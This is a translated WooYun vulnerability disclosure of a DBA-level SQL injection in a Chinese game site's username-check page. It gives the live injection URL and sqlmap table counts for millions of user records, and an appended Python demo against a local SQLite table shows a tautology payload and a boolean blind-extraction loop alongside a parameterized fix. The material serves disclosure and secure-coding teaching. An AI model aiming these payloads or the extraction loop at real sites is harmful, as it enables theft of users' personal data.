
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0144659

Title: Root-privilege (DBA) SQL injection on the 紫金岛 (Zijindao) game main site leaks 2 million user records and ten million user order records

Affected vendor: 91zjd.com

Reporter: 路人甲 ("Passerby A", a pseudonym)

Submitted: 2015-10-03 16:44

Fix deadline: 2015-10-13 09:00

Published: 2015-10-13 09:00

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags: (none)

Bookmarked by 4 users


Vulnerability details

Disclosure status:

2015-10-03: details sent to the vendor, awaiting vendor handling
2015-10-13: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Root-privilege (DBA) SQL injection on the 紫金岛 game main site leaks 2 million user records and ten million user order records.

Detailed description:

Injection point: http://www.91zjd.com/checkusername.aspx?name=
Appending a single quote to the name parameter immediately produces a database error, as shown in the screenshot:

(screenshot: 1.jpg)


sqlmap screenshot:

(screenshot: 2.jpg)


Current database:

(screenshot: 3.jpg)


DBA privilege:

(screenshot: 4.jpg)


Database contents (sqlmap row counts; entries whose names begin with View_ are views, not base tables)
dbo.UserMemberOrder | 10342305, i.e. roughly 10 million user order records
dbo.View_Userinfo_ME | 2172389, i.e. more than 2 million user records

Database: QPGameUserDB
+----------------------------------+-----------+
| Table                            | Entries   |
+----------------------------------+-----------+
| dbo.View_UserALLLogo_bySpid      | 116799666 |
| dbo.UserMemberOrder              | 10342305  |
| dbo.View_UserFristLogo           | 7304127   |
| dbo.View_VWUserFristLogo         | 7200557   |
| dbo.View_UserLogoNew             | 7010453   |
| dbo.GoldEggsLog2012              | 3307940   |
| dbo.View_Userinfo_ME             | 2172389   |
| dbo.IndividualDatumScore         | 2142378   |
| dbo.GoldEggsLog20110             | 540730    |
| dbo.Yjt_accounts                 | 500000    |
| dbo.View_CZK_TG                  | 357304    |
| dbo.Rechargeable_Card_TEST       | 356249    |
| dbo.DailyLogonPrize              | 307370    |
| dbo.ShortUrlLink                 | 178294    |
| dbo.accountsinfo20110101         | 117381    |
| dbo.QQcdkey                      | 99694     |
| dbo.IndividualDatumFirend        | 78305     |
| dbo.AccountsInfo0821             | 76835     |
| dbo.AccountsInfo_temp1           | 54253     |
| dbo.View_Rechargeable_Card_tg    | 14130     |
| dbo.AccountsInfo_emailbak        | 11156     |
| dbo.GameIdentifier               | 10001     |
| dbo.UserWincountlogo             | 8250      |
| dbo.iphonetemp1                  | 6195      |
| dbo.iphonetemp2                  | 4774      |
| dbo.AccountsInfo1121             | 4569      |
| dbo.dxuserall                    | 3148      |
| dbo.GameUserBang_TYBLogo         | 2358      |
| dbo.SystemStreamInfo             | 2325      |
| dbo.AccountsInfo_regtj           | 2253      |
| dbo.View_AccountsInfo_regtjNew   | 2253      |
| dbo.tempUsername                 | 2079      |
| dbo.dxUserbak                    | 1651      |
| dbo.GameUserBang_abestLogo       | 1465      |
| dbo.GameUserBang_abest_view      | 748       |
| dbo.AccountsInfobak              | 736       |
| dbo.IndividualDatumbak           | 550       |
| dbo.PK_SOURCE_IP_POOL            | 541       |
| dbo.LuckUser                     | 393       |
| dbo.AccountsInfo_xt              | 352       |
| dbo.UserAddScoreLogo             | 325       |
| dbo.VW_Charge_List               | 300       |
| dbo.dxuserlist                   | 209       |
| dbo.S3_Tmp                       | 156       |
| dbo.GameUserBang_New_tyb         | 93        |
| dbo.GameUserBang_TYB_WEEKLY_view | 93        |
| dbo.View_t1                      | 47        |
| dbo.test_0801                    | 46        |
| dbo.tempcity                     | 41        |
| dbo.we                           | 35        |
| dbo.View_t320                    | 29        |
| dbo.comd_list                    | 26        |
| dbo.ConfineContent               | 26        |
| dbo.D99_CMD                      | 24        |
| dbo.D99_Tmp                      | 22        |
| dbo.PK_GameDownloadCount         | 19        |
| dbo.View_t500                    | 17        |
| dbo.View_t310                    | 14        |
| dbo.ConfineAddress               | 3         |
| dbo.PK_WebPage_Click_Count       | 3         |
| dbo.SystemStatusInfo             | 2         |
| dbo.D99_REG                      | 1         |
| dbo.DIY_TEMPCOMMAND_TABLE        | 1         |
+----------------------------------+-----------+

Two things in this listing deserve attention beyond the raw counts. First, the injection runs as DBA on the database server, so the exposure is not limited to QPGameUserDB: with that privilege level on MSSQL an attacker can typically read every database on the instance and, if xp_cmdshell is enabled or can be re-enabled, execute commands on the host. Second, the names D99_CMD, D99_Tmp, D99_REG and DIY_TEMPCOMMAND_TABLE are the scratch tables that common MSSQL injection tools create when they run OS commands or read the registry through an injection point; unless the developers created them themselves, they are worth treating as evidence that this database had already been worked over by automated injection tools before this report was filed.
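The report shows only screenshots, so the following is an added example, not code from the original report or from 91zjd.com. It models the checkusername.aspx pattern (a username-availability check that answers with a count) against an in-memory SQLite database standing in for the MSSQL backend; the table and column names (AccountsInfo, Accounts, Email) and the two sample rows are constructed assumptions. It shows the three things the report relies on: a single quote breaks the concatenated query (the error the reporter saw), a tautology changes the count, and a yes/no answer alone is enough to pull arbitrary data out character by character, which is the loop sqlmap automates. The parameterized variant beside it returns 0 for every payload.

```python
# Added example (not code from the original report or from 91zjd.com).
# SQLite stands in for the MSSQL backend; AccountsInfo/Accounts/Email and the
# sample rows are assumptions for illustration only.
import sqlite3


def make_db():
    """Build a constructed two-row user table standing in for the real data."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE AccountsInfo (UserID INTEGER PRIMARY KEY, Accounts TEXT, Email TEXT)"
    )
    conn.executemany(
        "INSERT INTO AccountsInfo (Accounts, Email) VALUES (?, ?)",
        [("alice", "alice@example.invalid"), ("bob", "bob@example.invalid")],
    )
    return conn


def check_username_vulnerable(conn, name):
    """Availability check built by string concatenation: a single quote in
    `name` breaks the SQL syntax (the error the report observed) and any other
    input is executed as part of the query."""
    sql = "SELECT COUNT(*) FROM AccountsInfo WHERE Accounts = '" + name + "'"
    return conn.execute(sql).fetchone()[0]


def check_username_safe(conn, name):
    """Same check with a bound parameter: `name` is always data, never SQL."""
    sql = "SELECT COUNT(*) FROM AccountsInfo WHERE Accounts = ?"
    return conn.execute(sql, (name,)).fetchone()[0]


def probe(check, conn, name):
    """Run a check and report ('ok', count) or ('error', message)."""
    try:
        return ("ok", check(conn, name))
    except sqlite3.Error as exc:
        return ("error", str(exc))


def blind_extract(check, conn, target_sql, max_len=64):
    """Boolean-based blind extraction: recover the scalar result of `target_sql`
    one character at a time using nothing but the 0/1 answer of the check.
    SQLite's SUBSTR corresponds to MSSQL's SUBSTRING; sqlmap does the same
    loop with a binary search over the character range."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789@._-"
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in alphabet:
            # 'alice' exists, so the count is 1 only when the guessed char matches
            payload = f"alice' AND SUBSTR(({target_sql}),{pos},1)='{ch}"
            if check(conn, payload) == 1:
                hit = ch
                break
        if hit is None:  # end of the value, or the check is not injectable
            break
        recovered += hit
    return recovered


if __name__ == "__main__":
    db = make_db()
    print(probe(check_username_vulnerable, db, "alice'"))        # ('error', ...)
    print(probe(check_username_safe, db, "alice'"))              # ('ok', 0)
    print(probe(check_username_vulnerable, db, "x' OR '1'='1"))  # ('ok', 2)
    print(blind_extract(check_username_vulnerable, db,
                        "SELECT Email FROM AccountsInfo WHERE Accounts='bob'"))
    # prints bob@example.invalid
```

The fix is the parameterized form (SqlParameter in ASP.NET, `?` or named binds elsewhere); the application account should additionally be a low-privilege login scoped to the one database, since the DBA privilege is what turns a leak of one table into a leak of the whole instance.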


Proof of vulnerability:

Remediation:

Copyright notice: when reposting, credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: no impact (vendor ignored the report)

Ignored on: 2015-10-13 09:00

Vendor reply:

Vulnerability rank: 20 (WooYun assessment)

Latest status:

None